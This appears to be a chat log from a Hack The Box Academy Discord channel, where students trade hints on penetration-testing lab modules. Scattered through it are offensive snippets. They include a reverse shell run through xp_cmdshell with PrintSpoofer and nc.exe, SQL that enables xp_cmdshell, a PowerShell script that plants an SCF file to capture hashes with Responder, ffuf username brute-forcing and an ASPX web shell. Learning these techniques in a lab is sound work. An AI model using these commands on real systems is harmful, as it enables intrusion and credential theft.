#modules

the user I found isn't admin either

How do you know that?

logged in, it says don't have admin privilege.

so as not to spoil anything, send me a dm

is it the DC$ user equivalent to domain admin ?

Just solved it, thanx...

also I'm not sure how to prevent this exactly, if anyone up for a little sanity check on it (Broken Authentication > Skills Assessment), please

Another 1 bites the dust, maybe Freddie Mercury was a secret hacker on the quiet?

I've trying to gain Fully interactive TTYs on meterpreter shell, I got by exploiting using metasploit.

I couldn't use python,2,3 etc for the same.

However I was able to work through by using

/bin/bash -i

This is much better but still very less functional.

Any idea what should be done here?

Hey I’m stuck on the server side attacks skill assessment module, anyone who has recently solved it?

What exactly is not working?

Umm I’m having trouble figuring out how to approach the issue, any of the links on the page like menu etc don’t seem to be vulnerable and I didn’t really find any directories through ffuf enumeration

Have a look at the || source code ||

Hello, I have an issue - Windows Privilege Escalation - SeImpersonate and SeAssignPrimaryToken - Question 1:
After connecting
python ~/Tools/impacket/examples/mssqlclient.py sql_dev@{IP} -windows-auth
I use
SQL (WINLPE-SRV01\sql_dev dbo@master)> enable_xp_cmdshell
with response:
INFO(WINLPE-SRV01\SQLEXPRESS01): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(WINLPE-SRV01\SQLEXPRESS01): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.

But fail to get response for the whoami (or any other) command
SQL (WINLPE-SRV01\sql_dev dbo@master)> xp_cmdshell whoami /priv
SQL (WINLPE-SRV01\sql_dev dbo@master)>

Do you have some ideas? I am stuck here from quite a while now 😦 Thanks.

Did you run RECONFIGURE?

Both yes and no, on many resets of the box, neither way worked.

It won't work without it. You have to activate xp_cmdshell first

hi could i get a little nudge for file inclusion skill assesment?

So connect → enable_xp_cmdshell → RECONFIGURE → xp_cmdshell {commad}?

||
-- this turns on advanced options and is needed to configure xp_cmdshell
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
-- this enables xp_cmdshell
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE

||

https://www.mssqltips.com/sqlservertip/1020/enabling-xpcmdshell-in-sql-server/

@umbral fulcrum how to go about it?? I got username= gladys&pass=dWinaladasD13 but it takes me to 2fa.php and from their dead end.

Still no response 😦

anyone else issues with spawning targets ? mine hangs in "Target(s) are spawning..."

Hi, is there anyone for a sanity check with the Dead Code module of Secure Coding 101: Javascript?

Look in burp on that page, there’s something u can do

To understand it, I needed to explore all the options the application have.

Then I saw what I needed

the cookie?

Hi new here

Can someone help me in using burp

If you want to help them please DM me sir

DM if u want more elaborate hints, don’t want to spoil for others

What do you mean by no response?

I type xp_cmdshell whoami /priv and nothing happens, just get new line for new command.

Perhaps because xp_cmdshell is not activated?

It was activated, I was able to get a reverse shell using xp_cmdshell c:\PrintSpoofer.exe -c "C:\nc.exe IP PORT -e cmd.exe"
But only because I knew the SeImpersonatePrivilege was enabled as it was the point of the exercise. If I didnt Id just be stuck there.

Using pwnbox?

If so I think there's still the impacket issue on it

Where you need to reinstall it

In the api attack module in the broken authentication part I have tried brute forcing the OTP several times over and over again in less than 5 min with ffuf but it's not working ( I am using 6 digest otp ) and even tired logging in but it did not work did anyone encounter the same issue? here is the wordliste i used https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/6-digits-000000-999999.txt
i even inspected my requests on burp and it looked ok

Not pwnbox, my kali vm. I will check the impacket versions tho, thanks

DM!

Take help from YouTube

Can someone help me with this section
"Introduction to Malware Analysis
Code Analysis
Reverse Engineering & Code Analysis"

Hi I am trying to troubleshoot something, when I ran nmap from one vm in parrot it gave me the answer I was looking for when I ran the exact same from my kali vm it would give the ports but not the info from the script, I tried searching but other than nuking the vm what could be wrong with nmap to cause it? It has been confusing me all day (both nmaps are running same versions)

I obviously cant really move onto the last lab in the network enum vith nmap module without fixing it, thanks

i had the same issue, when i used their box i got the flag but when i used my vm i got nothing

yeah same but then I created a new parrot vm of my own and it worked fine, but my kali instance wouldn't so I am a bit confused, parrot instance for me keeps freezing after like 5 minutes no matter what resources I allocate so I am trying to just sort out my lab but I am trying to address it one by one. I find it odd as I have used my kali for loads of ctf boxes fine...

Is there a way to restart a module so I can do the updated version

No

ok thank you

https://academy.hackthebox.com/module/108/section/1233

Module: Vulnerability Assessment
Section: Nessus Skills Assessment

What IP am I supposed to run a scan on?

I might have ran it on the wrong IP. I ran a scan on the 10.x machine IP.

Once logged in, perform a BASIC NETWORK SCAN (modify the scan template to scan ALL ports, leave all other options the same) against the target: 172.16.16.100. Additionally, set up the scan to be authenticated using administrator:Academy_VA_adm1! as the credentials.

But I can't even ping this IP: 172.16.16.100

So I'm supposed to run scan on the machine IP I guess

It says the scan will take one hour, but for me

Start: Today at 6:53 AM
End: Today at 7:11 AM
Elapsed: 17 minutes

I didn't find anything the questions are asking about. I'm very confused.

So you are using the Nessus vuln scanner that is installed on one computer to scan another computer that you don't have direct access to.

No I'm using the web interface at https://10.129.78.137:8834/

I'm on the academy VPN

What IP am I supposed to scan?

I don't have nessus installed myself anywhere

Sorry if I misunderstood you

Right, you're on the VPN and can access 10.129.78.137:8834. In turn, 10.129.78.137 is multihomed and can access 172.16.16.100.
You --> vpn --> Neesus --> Target.

I'll try scanning that from Nessus then.

Yes, you won't be able to access or so much as ping 172.16.16.100 directly from your attack system.

Oh

Thanks

Running now. Let's see what happens.

There it goes

hello i need help for command injection skill assessments, i use || after a to= and i think there are a filter,I think I have tried everything but may be that there is something I do not understand if there is someone who can help me to understand the problem please

Try on something that is doing a command not just showing the file

If I remember correctly u may get an error that reveals a command being executed

Try play around with the website

Yes, try all the options in the module to bypass the filters, and mess around with the website to see what you might be able to use

I think I have used all even whoami

Try to find an option other than view

I looked at my POC to get command execution, all I can say is it took me trying a few different combinations of bypassing filtres ( all from the cheat sheeet), and modifying parameters for the website url as part of it

I will reread all the courses because it is too dark for me I really try everything I even try the ajax parameter but nothing

i am russian

epic

can anybody assist me with the logrotate exploit from the Linux LPE module?

I get the```sh
Waiting for rotating <redacted>
Renamed backups with backups2 and created symlink to /etc/bash_completion.d
Waiting 1 seconds before writing payload...

and trying it again fails

nvm got it working

so unreliable

why does echoing it beforehand work better lol

It’s not something u didn’t understand

In the skill assessment u have a site with files and u got three options
View
Copy
Move
Which one of those do u think is doing something in the backend aka doing a command execution

Try to use something simple like (pwd) and try to put every bypassing method u have learned

Do yall know where i can find help about tor broswer?

Try asking in the general this room is for the modules only

Cant talk in general

Follow the instructions in #welcome

@rustic sage

whoops, I replied to the wrong person there, sorry

Np

Ok the module that uses ODAT needs updated to not provide the "installation" script. The pentest flavors of linux make it difficult to install it that way especially if you're using an arch based system instead of deb based. The install from the ODAT github does work though...so far.

I wasted too much time trying to fix that script... it probably would have been fine had i built my own arch system but the preconfigured systems make the pip install stuff not work properly

All software installations shown are basically for the PwnBox. Does it work in the PwnBox?

Not sure, haven't tried that. I'm using an AthenaOS vm, but I did try it with a kali vm and had similar problems since the python environments are locked down on them. so the pip3 stuff doesn't work, it wants you to use pipx but then pipx wants you to use pip since it's a library.

You can remove the EXTERNALLY-MANAGED file

Yeah, I just always worry about doing stuff like that on preconfigured systems cause I don't know how much or what exactly if anything that would break

It doesn't break much of anything

oh ok nice . I really just need to spend the time and build me a nice little nixos box so I can just use tools on the fly as needed instead of having to bload the entire system for a task

I use parrot myself

What path do i do after infosec?

It depends on what do you want out of your life

Can you guys help me out? what steps should i take to make sure that i will pass the CPTS? What i do is i read the entire module, then i make a summary for myself, then do the exercises by referecing the module. Am i doing it right or should i do something elses?

I want to be a pentester/ethical hacker

Me too

How do you make summary? And how much time does it take you to make summary?

First im getting the cpts, then i will do htb labs and ctftime

Explain to yourself what is going on

Hey all, I'm currently working on AD and on using inveigh. i ran the ps1 script but there was no hash in the output and i also checked the txt file of the log and there was no hash too. idk where im doing wrong. any help will be appreciated.

Sounds like you're doing it the way I do. Practice to feel comfortable with the processes and explore things on your own. Being a hacker is fiddling with all the options, trying multiple ways and deciding which you prefer and which is a backup in case the first one doesn't work. ¯_(ツ)_/¯

Can you send pic of one of your summaries

Do the exercises as you learn them

I dont have any right now but it goes like this "To hack ftp, first run a nmap scan on port 21 with default scripts, after detecting what ftp service use nmap scripts that will show more info about that process, then check for anonymous login..."

What do you mean?

That's only if ftp is running on default port

Aka do it as you read the section

thats true, allways do a full port scan

Don't read then go back

Because as you do, you can adjust your notes

Aye guys looking to start a group if anybody interested hmu!!!🤙🏻

So the steps are 1 read 2 take notes 3 do exercises 4 done learning

Heck half of my notes in the web modules is me doing the question for it and screenshotting the process

As the examples don't always match the practical

@marble island Oh shit i've been doing it wrong this whole time! i've been going straight to the attacks....

There's no "wrong way"

IK

Unless you're just cheating by following writeups/videos

I was just being facetious

nope don't look up that shit until i'm certain it's a module issue lol

But otherwise the right way is the way that helps you retain the knowledge

What i am doing is that i just get familiar with the concepts, know where is the knoledge that i will need to the CPTS, and thats it

The knowledge level you'll need is what's taught

• resourcefulness

No matter what i do i allways forget the commands and the specifcs

Like, my port scan found smb, i know that there is smb section on footpriting module

There's other tools out there not well listed or used by the pentest flavors of linux. Github has lots of great projects out there

My new strategy is: read the module, do a summary of what i read, do the exercises (see solution if im stuck), then i will know where to go back to when im doing the cpts

Ok folks. I am stuck on the Web attacks skills assessment. I have identified the || admin user || , the || token|| for || uid 52|| . I changed the || uid in storage from 74 to 52 || and then go to the profile page and I see I am || The admin user, however I am unable to change the password I get access denied, I think because I have the session cookie of the htb-student user. I tried changing from a POST to a PUT, and I get missing parameters. || I have fuzzed for the parameters using FFUF and am coming up empty|| Can someone nudge me, I don't want the answer, but i'm clearly missing something.

You don't need to remember specifics tbh

I think i will pass doing this am i right?

Most sections are designed to be done as you read them

it's not like one of those absolute book answer question tests.

Looking at you PPL!

(Just don't be surprised if something doesn't work as the example)

Always be flexible in your methods

let me rephrase that for you. Expect the example to not even be close to working....

While the example might not work; the method can still apply

Is the method 1 read 2 make summary 3 do exercises 4 make skills assesment then make exaplanation of what i did. a good mothod?

Nah some examples are 1::1

i've run into examples not working more times than i would have thought honestly, and i think a lot of it is just the difference in systems

some...but i've run into a lot that won't work on anything not the pwnbox

Not really a difference of systems. Just a difference of skill

oof

https://tenor.com/view/steven-he-emotional-damage-steven-he-emotional-damage-gif-23428142

is this good?

sure, I mean I wrote a python script that kinda walks you through the step of tools for what phase you're on...

it's like notes but more interactive

wait what? you did a python script that does what?

If it works for you. That's what's important

basically you enter the target(s) then it has a list of tools it calls for whatever step you're on. and then for each tool it has a list of different attack options....just automates things a little bit. let's you drink more coffee

gee thats overkill

i like making my life easier :-p

Eh automating the process really only works if you understand it

oh right

And for the exam you'd still need to prove you know what you're doing via the report

what did you 2 do to learn the modules and pass the cpts?

true, I do need to add in automation to report generation :-p thanks for the idea

That's not how that works lol

You need to follow the template

haven't taken cpts yet still going through modules.

and you can't automate that? :-p (openvas, maltego)

No

there are most definitely expensive automated tools that generate detailed reports for you

Besides if you use sysreptor the template is basically right there

You still need to input info

eww

How did you pass the cpst @fathom pendant ?

I haven't taken it

I'm gonna steal facebooks thought stealing technology and you just think it and the report fills itself out for you

There's plenty of articles/blog posts in #cpts

How would you go about studying the modules if you where to take the cpts?

I just do, and write out my process of performing the exercises

Documenting w/ screenshots and such

I use Obsidian for my notes

write the process of performing the exercises? I think i am going to do that

isnt't obsidan dirty propietary software?

Yes. It helps solidify your understanding

No

works good for me

You can use it for free

Free for personal use

free as in freedom?

I have all my notes synching to git every 2 mins

i use cherrythree

And there's a plugin for everything

notation is nice too

I like obsidian for using the canvas though

Ah I see you're a Chad git extension enjoyer

Use em if they are there I say 🙂

gitchad should definitely be a website

i succeeded 🥲

I will try obsidian, thanks for the tip i did not see the github link in their main website and thought it to be propietary

congrats👍

Cheetsheets for HTB copy over nicely in markdown to obsidian

They have the download on their site as well

i have a question regarding report writing in general. i am currently doing ANE module and found tons of vulnerabilities and wanna write findings on them all but what if i in real-life didn't manage to find ALL the vulnerabilities or write them but instead put the ones that got me initial access? would that affect my score in the CPTS exam and get me rejected?

I hadn't seen the little copy mv option and was concentrating on the url ?to= request.

It's best to write all vulns you find

And you can't write about a vuln you don't find

Btw is anybody a pentester? How would you people go about getting a pentester job? My strategy is do the CPTS, then start doing the hackthebox labs to train for CTFS, then do CTFs till i eighter got it from winning ctf or from impressive CTFtime score. I live in Brazil and would like to get pentester job abroad

try and make the best out of it 🙂

i do but i talk about the case of "what if" would they fail me for it?

Your attack path will include the vulns you used

anyone able to give the the slightest of nudges ? I found the way, within a few minutes, but am struggling to execute it

No one can answer that, as it's technically exam content

Think about the info you'd want if you're the client

i mean say there is xss found in one subdomain out of 10 and in those 10 subdomains you didn't find that xss but you found command injection that gave you initail access and then wrote a report based on that would hackthebox fail you for not writing that xss that you didn't find?

Let me check my notes. I feel I just did that one recently.

And just because you couldn't exploit it, doesn't mean another attacker couldn't

How would you know the xss is there if you couldn't find it

i don't but those who wrote the exam do what if they say "skill issue" then fail me for it?

They grade the exam based on what you found. And your report info

They're grading it as the company contracting you, and they don't know all the vulns

But again your questions are getting specific to the exam grading. Which cannot be answered by anyone

thats better to know but i'll write everything just in case in my exam

Write everything you find. Always. As a customer, I'd be pissed if you found a vuln but didn't tell me about it

How would you people go about getting a penetration tester job?

Start in IT

Get your foot in the door with tech

I work as a linux sysadmin in a hostpital

As the market is saturated af with already skilled/talented individuals

Then reach out internally to see if positions are open

Otherwise just search.

why r trying ||PUT ||only?

You know that hospitals have crap opsec? i did a pentest for them

If you haven't looked at the reset password function, I would give it a look.

@marble island if you read and follow #welcome you can access #careers-and-certs which is a better channel for your question

I tried the others as well

No access

First part of my statement

feel free to dm me

Yes, I am there and am getting access denied on some method, other method it says || missing parameters||

You can DM if you would like.

👀

hey! sorry for randomly jumping on this message. Can you tell how to enable smb capture?

Are you good now?

Yes, thank you. I assumed incorrectly one Verb would not work, when I tried that I got it

hi this command isn't working:

cp /usr/share/laudanum/aspx/shell/aspx /home/tester/demo.aspx

Getting cannot create regular file error.

This is for Laudanum section of shells and payloads module.

┌─[us-academy-4]─[10.10.15.126]─[htb-ac-605555@htb-zdxwfht2u6]─[~]
└──╼ [★]$ cp /usr/share/laudanum/aspx/shell.aspx /home/tester/demo.aspx
cp: cannot create regular file '/home/tester/demo.aspx': No such file or directory
┌─[us-academy-4]─[10.10.15.126]─[htb-ac-605555@htb-zdxwfht2u6]─[~]
└──╼ [★]$ sudo cp /usr/share/laudanum/aspx/shell.aspx /home/tester/demo.aspx
cp: cannot create regular file '/home/tester/demo.aspx': No such file or directory

wait fixed it

I think I fixed it I made the /home/tester folder I wanna see if tutorial works anyways I might have figured it out on my own

I figured it out on my own never mind

Why not just copy to your home?

In this instance [tester] is you

I am trying to triage an issue, it's on my end but I don't know what else to do; when I run nmap it won't run scripts to allow me to move on with the network enum with nmap, I tried different os instances

on different devices it works except my own vmware workstation lab, what could cause this?

I know a work around is to use the pwnbox but if nmap isn't working properly I can't really do ctfs and know what I am getting back is accurate

I'm currently on detecting windows attacks with splunk, authenticating with the credentials they gave me but its not working , "connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!'", I'm using the xfreerdp command? has anyone else run into this issue

hey everyone. can someone share some detailed notes from the dacl attacks i and ii modules please?

Some of the sections in nmap just work better in pwnbox

You'll need to make your own notes

Other peoples' notes do you no good, as they wrote their notes to understand it for themselves

so it may not be a me issue it's just a case of in this instance it works better because I even tried the htb version of parrot on my vm

Htb version of parrot != pwnbox

They are maintained completely separately

no I meant the iso from parrot website

Htb edition is just security edition with some minor theming

ohh sorry misread

so best point of call moving forward for modules use pwnbox then just take notes?

alright thanks, it has been driving me nuts

You can use your own vm

It's just only occasionally that for whatever reason pwnbox just works

ok cool, thanks for that, it worked on other devices but I will just move on now, thanks for your response

Version difference of tools can also affect outcomes

yeah they were all on 7.9.4 which is the latest version of nmap. Doesn't matter I will just use the pwnbox for the hard lab then I can quit moaning haha

The hard lab is pretty simple once you figure out the source of it

remove unnecessary instructions. DM if still stuck.

Hey everyone, I'm currently on the Medium lab of IDS/IPS evasion with nmap. The task is to retrieve the DNS server version, which I though I had completed but isn't the correct answer. Willing to send screenshots in a DM as to not spoil anything for anyone else.

You can try connecting directly with netcat, otherwise try with the pwnbox.

Apologies, I'm a little confused by that tip. I was able to connect to the target and retrieve information from the nmap scan, which included a version return (possibly incomplete which is why the answer appears wrong?) . The IPS seems to block a nc connection. My scan was only able to retrieve the version information with a UDP scan

Update: Exact same command worked with pwnbox. Thanks for the help! Didn't realize that could be an issue

Reading upwards a bit I see that someone else had a similar situation on another module. Just for my own curiosity's sake; if the personal vm and the pwnbox are using the same version of nmap, what makes the results change?

Which is intended

It can, slight differences can cause issues

Attacking Common Applications Attacking GitLab - User Enumeration.

Okay, what wordlist should I be using? I've found 10 users, and 8 of the 10 are made by other people. I've used a number of the wordlists in ||seclists/usernames|| (the shorter lists and running a longer one now) and still haven't found the actual user they're wanting. ||go for defaults||

oh well I wasn't thinking of that lmao

thank you I'm an idiot

😆

https://www.canyons.edu/academics/networking/programs/cybersecurity-as-degree.php

Can someone tell me what kind of job this will get me and how much it pays?

That would be best to ask in #careers-and-certs

But to get there: Please read #welcome and #rules 🙂 it will explain how to get verified

I was curious about this nmap issue you were speaking about. So I quickly re-ran the nmap medium and hard labs to see if anything has changed since I first done them.
On freshly spawned targets, It works as expected from my parrot vm, same nmap version as yours. During cpts path, i think I never had to use the pwnbox to get an answer.

Also I saw earlier you had issue with freezing parrot. I encountered the same kind of issue with parrot or kali: a keyboard lag leading to freeze the whole thing. A solution for me, with a Intel processor, was to check Virtualize IOMMU option under processor settings. Otherwise I got the processor setting at 2 proc 2 cores, then a fair amount of ram.

hello any one have done broken auth

ffuf -w list/multiplesources-users-fabian-fingerle.de.txt:FUZZ -u http://94.237.49.212:59399/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr " Unknown user."

i am fuzzing username if there is any mistake in this cmd

The only issue I can see is the file you are using for the wordlist. I used the xato-net-10-million-usernames.txt and it worked for me.

i have also use this word list
└─$ ffuf -w Downloads/xato-net-10-million-usernames.txt:FUZZ -u http://94.237.49.212:59399/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr " Unknown user."

    /'___\  /'___\           /'___\       
   /\ \__/ /\ \__/  __  __  /\ \__/       
   \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
    \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
     \ \_\   \ \_\  \ \____/  \ \_\       
      \/_/    \/_/   \/___/    \/_/       

   v2.1.0-dev

:: Method : POST
:: URL : http://94.237.49.212:59399/index.php
:: Wordlist : FUZZ: /home/hasnain/Downloads/xato-net-10-million-usernames.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : username=FUZZ&password=invalid
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Regexp: Unknown user.

:: Progress: [1/8295455] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0:: Progress: [40/8295455] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: :: Progress: [40/8295455] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: :: Progress: [40/8295455] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: :: Progress: [73/8295455] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: :: Progress: [73/8295455] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: :: Progress: [80/8295455] :: Job [1/1] :: 0 req/sec :: Duratio

Try removing the :FUZZ after the file name. That should help.

And watch closely for a result to pop up. As soon as one does, stop the scan and see what the result is

ffuf -w Downloads/xato-net-10-million-usernames.txt -u http://83.136.255.40:44527/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr " Unknown user."

    /'___\  /'___\           /'___\       
   /\ \__/ /\ \__/  __  __  /\ \__/       
   \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
    \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
     \ \_\   \ \_\  \ \____/  \ \_\       
      \/_/    \/_/   \/___/    \/_/       

   v2.1.0-dev

:: Method : POST
:: URL : http://83.136.255.40:44527/index.php
:: Wordlist : FUZZ: /home/hasnain/Downloads/xato-net-10-million-usernames.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : username=FUZZ&password=invalid
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Regexp: Unknown user.

:: Progress: [40/8295455] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors:

same issue

xfreerdp dying

file transfer module
windows section

R u sure it’s on the index.php?

Maybe on other page on some login.php

try adding /timeout:10000 and also wrap your password in quotes due to the special characters. if that doesn't work switch regions.

yes i am sure

in which section u r in?

broken auth

enumerating users

your command isn't the exact same as the example, not sure if that's your problem though

all that i can think of is that u didnt get the vpn files to work well or that ur worldlist dosent have the vaild username

your command is fine i just ran it and got the answer maybe switch vpn's

the one i use has 8295455 usernames

ok thanks

ok thanks

i will update you

hello

The sudo responder -wrf -v -I tun0 command appears fine in the case, but I started pwnbox incorrectly

İt looks like between the versions you are using, the option -r is removed

Thanks, but deleting the -r doesn't seem to work either

rtfm man
https://github.com/lgandx/Responder?tab=readme-ov-file#usage

there's also the -h flag you can use

Hey buddy, I also downloaded the latest version on Github

great, the repo documentations will tell you what flags you can use, so will -h

I was wondering why pwnbox doesn't have python2 built in

Oh, so I typed the wrong version

Hey, his title is capturing SCCM_SVC hash but I only have htb-student traffic

module and section?

okay got it

Good morning, as anyone finished the Exploiting Web Vulnerabilities in Thick-Client Applications

I am with the fatty-client.jar application... I have finally managed to install jave 8 but now I get this error when I try to run it

don't run as root

also don't they provide you a machine with java already installed?

it comes with java 17

the pawnbox

thanks!

the target machien you rdp into already has java installed

but I give up trying to solve the module using the windows machine...

window of the machine looks super small and I could not get the new fatty-client file to run...

now I am trying to solve it with the pawnbox

use remmina or add /dynamic-resolution to your xfreerdp command

seems a lot of people had trouble with this module...

I am using remmina

lets see if I manage 🙂 for sure I will ask more things! thank you!

Is there a study plan for cpts like oscp?

@next bronzeCan you give me a hint?

the Penetration Tester job role path is the course for the CPTS certification

I have no idea what module and section you're doing

https://academy.hackthebox.com/module/67/section/630

Yea what about like having a 12 week plan kind of thing

Is that there

you will have to make a schedule for yourself

ok but what are you actually doing here? make a scf or lnk file and point to your own ip, then capture the hash

everyone learns differently, so something like that has to be made by the student

I captured it, but no SCCM SVC

make a scf or lnk file and point to your own ip

It doesn't seem to be working.

did you rename the extension after saving it in notepad?

it's also on the desktop and not in a share

Why can't I traverse into the Desktop directory as a normal user?

because that's root's desktop

But what about the permissions for other users? Do they not apply?

execute permission is there

You mean my (IconFile=\10.10.14.101\share\legit.ico) should be IconFile=\10.10.14.101\legit.ico？@next bronze

the root dir has special restrictions, why do you want regular users to access stuff in root's desktop anyways?

I suggest to read the section again

This can be particularly useful if we gain write access to a file share that looks to be heavily used or even a directory on a user's workstation.

place the file in the target's share

Hello, in Attacking Enterprise Networks Module - Lateral Movement section, does anyone know what is the password for the bloodhound they suggest to use here? they dont give it in the section's page.

just experimenting

it's my own VM

Is that what it means?

so permissions don't count as root has special restrictions?

yes, you can experiment in other dirs like /tmp, messing with permissions in /root is a bad idea

sure but what other ways can you access and place files in smb shares?

Hello 👋

How to know neighbour wifi password to android ☑️

you go ask them the password

He can not show there password

guess you're out of luck then

I try it but FAILED

guess you'll just have to use your own internet

Any application for know any password of wifi

hi everyone,
in linux fundamental module, system information lession,
i couldnt submit the answers for
What is the path to htb-student's home directory? and
What is the path to the htb-student's mail?

im sure im inserting correct but it shows wrong answer

Hello, why can't I turn on Active Directory Users and Computers after following the steps to join the domain?
https://academy.hackthebox.com/module/74/section/1393

looks like you need to log in as a domain admin

anyone knows?

I can't find where the domain admin is on this page
This step is not mentioned in the solution
https://academy.hackthebox.com/module/74/section/1393

The section provides 2 sets of credentials, did you try the one that says "utilize xxx account to join the host to the domain"?

xfreerdp /v:10.129.80.249 /u:htb-student /p:'Academy_student_AD!' /timeout:1000 /cert:ignore
[05:45:48:027] [2825:2826] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[05:45:48:032] [2825:2825] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]

keep getting this error any help?

looks like it timed out. maybe change regions. also might want to increase your timeout value.

C:\Department Shares\Public\IT\test.scf

But I have this problem

You need sudo

Or maybe something else is running on port 80

No

─[eu-academy-3]─[]─[htb-ac-1104324@htb-qbbbwtcm8y]─[~]
└──╼ [★]$ sudo lsof -i :80
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
python3 3756 htb-ac-1104324 3u IPv4 36910 0t0 TCP htb-qbbbwtcm8y.htb-cloud.com:http (LISTEN)
python3 135647 htb-ac-1104324 3u IPv4 36910 0t0 TCP htb-qbbbwtcm8y.htb-cloud.com:http (LISTEN)
python3 135647 htb-ac-1104324 4u IPv4 333171 0t0 TCP htb-qbbbwtcm8y.htb-cloud.com:http->94-237-75-116.sg-htb1.upcloud.host:47912 (ESTABLISHED)
python3 198574 htb-ac-1104324 3u IPv4 36910 0t0 TCP htb-qbbbwtcm8y.htb-cloud.com:http (LISTEN)
python3 198574 htb-ac-1104324 4u IPv4 481084 0t0 TCP htb-qbbbwtcm8y.htb-cloud.com:http->94-237-75-116.sg-htb1.upcloud.host:39734 (ESTABLISHED)

port 80 doesn't really matter since you're trying to farm hashes from smb

sudo python3 Responder.py -I tun0 -w -v

$scfContent = @"
[Shell]
Command=2
IconFile=\<your_ip_address>\icon.ico
[Taskbar]
Command=ToggleDesktop
"@

$scfFilePath = "C:\Department Shares\Public\IT\test.scf"
Set-Content $scfFilePath -Value $scfContent -Force

He doesn't seem to have taken any of the other users

help me

good job you should probably delete that pic though

thank you for your help

sure
but only image can successfully log in from xfreerdp

check if you have spelled the password correctly

i thought i would find it with same pwnbox without ssh,
now good, i manage to find the correct answers with the appropriate ssh connection.

thank you !

in the Python Library Hijacking section of the Linux LPE module, there is a SUID py3 file that we can run. However, if we hijack a library and add our own os.system("id") code, the SUID binary (when run) outputs the id of htb-student rather than root. If I do the same via sudo, however, it runs as root. Does this mean I can't python lib hijack SUID scripts?

I assume this is because the binfmt extension actually makes it run /usr/bin/python script.py, so the executable is actually /usr/bin/python, which is not SUID?

Hi, I am doing https://academy.hackthebox.com/module/57/section/516. I have generated the username list using anarchy and password list using cupp from the hint. But I am not able to get successful login. Any hints please?

I can't answer for the details as to why because it was quite some time ago, but I do recall a project where I had to write a stub program in C to compile and run as SUID after learning you couldn't apply that permission to scripts. It is a security thing. And, so I can confirm that part for you at least.

yeah /bin/sh drops privileges now, it's a security feature

but I think the reason python does it is slightly different 😄

I'm not at my PC to check the module, but you should use the neo4j creds to login to the bloodhound gui. It's different if you're using the CE version, but I don't recall that in the modules.

I'm really stuck and can't seem to get past this module Information Gathering - Web Edition -> Virtual Hosts. The task is to bruteforce virtual hosts on the target system. but it's not working i have tried almost all the tools like gobuster ffuzz and others but it seems that i can't succesfully find the full domain of "web" and others can someone please help me in the right direction?

i eventually used PowerView instead of bloodhound. Thank you!

I have a question

anyone?

Is there a machine that van read and emulate rfid signals not thé flipper zero tho

proxymark?

Does it need laptop to work @bright quiver

no not necessarily you can use it in standalone mode, the older version you can pair with a raspberry pi or laptop

Oke thanks do they sell it on amazone

I don't think so but they are quit expensive for the OEM one but the functions they have are worth the price. proxymark 3 RDv4 can be used in standalone mode

Thanks Alot

Is it like more then 200

lab401 have them and they are original and they ship worldwide i think https://lab401.com/products/proxmark-3-rdv4

keep in mind this is the best of the best tool that you can get and outperforms any flipper zero in function, but requires that you have knowledge about NFC and frequencies blocks and stuff

You can DM what you have done so far.

Sure thanks!

hello, why am I unable to connect to rdp?

I'd need to do some troubleshooting to figure that one out. Are you in the same network at the target; is the port open; etc.. What module/section are you on could help clarify things.

thanks for the help, I looked it up online and figured out a way

Hi all, I'm doing the lab in Information Gathering - Web Edition, Virtual hosts module. I added the IP address and domain name in /etc/hosts (94.237.59.199 inlanefreight.htb) and then enter the gobuster command (gobuster vhost -u http://inlanefreight.htb -w subdomains-top1million-110000.txt -t 50
), I'm getting the above error. Can anyone help me with this?

You need to --append-domain

Also you need to specify the port

Http://inlanefreight.htb:port

Because there indeed isn't a web port on 80 for that target

gobuster vhost -u http://inlanefreight.htb:32343/ -w subdomains-top1million-110000.txt --append-domain

Go this error again after trying with that command

Antivirus is blocking the connection.

I tried with fuff tool

Well that would be your isp, not the target

You shouldn't be running any av on your vm

disable it then

Yeah, got it

I'll try it

love me in the metasploit module I have to compile a binary but Pwnbox has GLIBC 2.34+ but the remote server does not and also has no gcc so I can't compile a binary that works there

I don't remember needing to compile anything... I just grabbed from a release

how the fuck do I run this from meterpreter 😂

I tried dropping into shell but it's non-interactive

What section? I genuinely don't recall compiling anything for meterpreter, maybe the msfvenom payloads

dw isok

I need to run a sudo exploit

under Sessions

Oh... I didn't need to do any compiling

Just background the session, pull up the b* post-exploit, attach it to the session that your connection is on. And just run it

You might need to adjust the LPORT

And lhost

But I don't remember compiling anythign

oh ffs it's a metasploit module

lmfao

yeah ok worked now

lol

thanks @fathom pendant

overthinking is the enemy

yup

I did the Linux LPE module just before this so

it was fresh in my mind

Hey, what should be the next step after I complete all the tiers in starting point?

you can move onto retired machines

